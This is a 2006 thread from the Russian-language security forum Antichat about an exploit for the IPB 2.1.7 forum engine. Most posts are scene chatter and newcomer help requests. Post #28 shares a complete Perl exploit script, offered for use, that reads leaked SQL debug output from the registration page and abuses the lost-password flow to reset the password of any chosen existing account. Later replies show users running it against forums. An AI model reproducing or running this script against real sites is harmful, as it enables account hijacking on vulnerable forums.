ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

  #21  
Старый 04.11.2006, 18:49
Utochka
Постоянный
Регистрация: 21.12.2005
Сообщений: 620
Провел на форуме:
1867718

Репутация: 268


По умолчанию

думаю сцена переживает некий переломный момент, либо в скором времени появиться команда которая с новой силой будет находить баги и выпускать интересные релизы, либо хак уйдет в полный андеграунд. ИМХО сейчас хак является попсовой вещью.

Интересно посмотреть, что будет через год или более.
 

  #22  
Старый 04.11.2006, 21:07
}{0TT@БЬ)Ч
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
Провел на форуме:
3536885

Репутация: 447
По умолчанию

Цитата:
Сообщение от Elekt  
Вовремя рст ушли со сцены.
Все возможные и невозможные критические баги в phpbb и ipb видимо уже найдены.
Я не удивлюсь если скоро появится новый двиг форума и новая команда которая будет выкладывать баги к нему
 

  #23  
Старый 04.11.2006, 21:59
limpompo
Друг Клитора
Регистрация: 27.08.2005
Сообщений: 1,662
Провел на форуме:
6913553

Репутация: 1329


По умолчанию

HELP:
Код:
Это описание для тех, кто не знает, как сделать так чтобы заработал php_curl:

1. Качаем http://limpompo.jino-net.ru/php_curl.rar
2. Копируем libeay32.dll и ssleay32.dll в диру c:\windows\system32\
3. Копируем  php_curl.dll в диру [you_apache_dir]\php\extensions 
4. Редактируем PHP.ini - Удаляем Комент с extension=php_curl.dll
5. Перезагрузи Апачу! 
6. Уря =) Работает... ыыыыыы

С Уважением limpompo.

Последний раз редактировалось limpompo; 04.11.2006 в 22:16..
 

  #24  
Старый 05.11.2006, 22:05
F.A.Q [R3x]
Новичок
Регистрация: 26.09.2006
Сообщений: 9
Провел на форуме:
34218

Репутация: 1
По умолчанию

Плиз помогите ЛАМУ как вообще пользоватся Php скриптами? Дайте хоть ссылку на видео плиз или опишите как их использовать.

З.Ы. буду очень признателен
 

  #25  
Старый 05.11.2006, 22:29
InferNo23
Участник форума
Регистрация: 05.09.2006
Сообщений: 187
Провел на форуме:
6860213

Репутация: 378
По умолчанию

Вот прочитай:

http://forum.antichat.ru/thread26510.html

сплоиту нужен php_curl.dll, как его прикрутить к php смотри выше...
 

  #26  
Старый 06.11.2006, 21:07
F.A.Q [R3x]
Новичок
Регистрация: 26.09.2006
Сообщений: 9
Провел на форуме:
34218

Репутация: 1
По умолчанию

ок спс большое
 

  #27  
Старый 07.11.2006, 09:29
rowil
Новичок
Регистрация: 06.11.2006
Сообщений: 1
Провел на форуме:
15836

Репутация: 0
По умолчанию

А почему когда запускаешь сплойт появляется пустое окно?
 

  #28  
Старый 08.11.2006, 05:47
KSURi
Постоянный
Регистрация: 06.06.2006
Сообщений: 515
Провел на форуме:
1985206

Репутация: 963


По умолчанию

Цитата:
Вот если бы сплоит вышел на Perl было бы другое дело))
Цитата:
Выложите плиз на PERL этот сплоит!
На всяк пожарный выложу: (тока я его не тестил!!!)
Код:
#!perl -w

use strict;
use LWP::UserAgent;

my $target="http://127.0.0.1/board/index.php";    # victim
my $name="hax0r";                                 # existing user
my $pass="31337";                                 # password to set
my $proxy="";                                     # optional: http proxy

my($prefix,$suffix,$regid,$regcode);
my $ua=LWP::UserAgent->new();
$ua->proxy("http",$proxy) if($proxy);
my $response=$ua->get($target."?act=Reg&CODE=10");
if($response->is_success)
{
  if($response->content=~/<span class=\'green\'>INSERT<\/span> INTO <span class=\'purple\'>(.+?)_reg_antispam<\/span> \(regid,regcode,ip_address,ctime\) VALUES\(\'(.{32}?)\',(.+?),/im)
  {
    $prefix=$1;
    $regid=$2;
    $regcode=$3;
  }
  else
  {
    $suffix="&debug=1";
    $response=$ua->get($target."?act=Reg&CODE=10".$suffix);
    if($response->is_success)
    {
      if($response->content=~/INSERT INTO (.+?)_reg_antispam \(regid,regcode,ip_address,ctime\) VALUES\(\'(.{32})\',(.+?),/im)
      {
        $prefix=$1;
        $regid=$2;
        $regcode=$3;
      }
      else { exit print "\nExploit failed!\n" }
    }
    else { exit print "\nExploit failed!\n" }
  }
}
else { exit print "\nExploit failed!\n" }
$target=$target.$suffix if($suffix);
$response=$ua->post($target,[act=>"Reg",
                             CODE=>11,
                             member_name=>$name,
                             regid=>$regid,
                             reg_code=>$regcode]);
if($response->is_success)
{
  if($response->content=~/<span class=\'green\'>INSERT<\/span> INTO <span class=\'purple\'>'.$prefix.'_validating<\/span> \(vid,member_id,real_group,temp_group,entry_date,coppa_user,lost_pass,ip_address\) VALUES\(\'(.{32})\',(.{1,32}),/im)
  { changePass($regcode,$regid,$1,$2) }
  elsif($response->content=~/INSERT INTO '.$prefix.'_validating \(vid,member_id,real_group,temp_group,entry_date,coppa_user,lost_pass,ip_address\) VALUES\(\'(.{32})\',(.{1,32}),/im)
  { changePass($regcode,$regid,$1,$2) }
  else { exit print "\nExploit failed!\n" }
}
else { print "\nExploit failed!\n" }

sub changePass
{
  my($regcode,$regid,$vid,$userid)=@_;
  my $ua=LWP::UserAgent->new();
  $ua->proxy("http",$proxy) if($proxy);
  my $response=$ua->post($target,[act=>"Reg",
                                  CODE=>03,
                                  type=>"lostpass",
                                  uid=>$userid,
                                  aid=>$vid,
                                  regid=>$regid,
                                  reg_code=>$regcode,
                                  pass1=>$pass,
                                  pass2=>$pass]);
  if($response->is_success) { exit print "\nExploited!\n" }
  else { exit print "\nExploit failed!\n" }
}
 

  #29  
Старый 20.11.2006, 05:47
-Bart-
Новичок
Регистрация: 25.04.2006
Сообщений: 11
Провел на форуме:
32456

Репутация: 3
По умолчанию

C:\Documents and Settings\Bart>C:\Downloads\ipb217.pl

Exploit failed!
 

  #30  
Старый 20.11.2006, 08:42
_Great_
Флудер
Регистрация: 27.12.2005
Сообщений: 2,372
Провел на форуме:
5339610

Репутация: 4360


Отправить сообщение для _Great_ с помощью ICQ
По умолчанию

Ну failed - значит, failed, значит, форум патченный. Чеж ты хочешь то тогда
 
Закрытая тема



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
О законе. _-[A.M.D]HiM@S-_ Статьи 28 01.11.2007 12:25
Софт для мобильных телефонов под *nix Grrl Сотовый фрикинг 2 02.03.2007 01:47
Редактирование содежимого прошивок для Самсунгов Digimortal Схемы и программы 3 28.02.2007 14:22



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ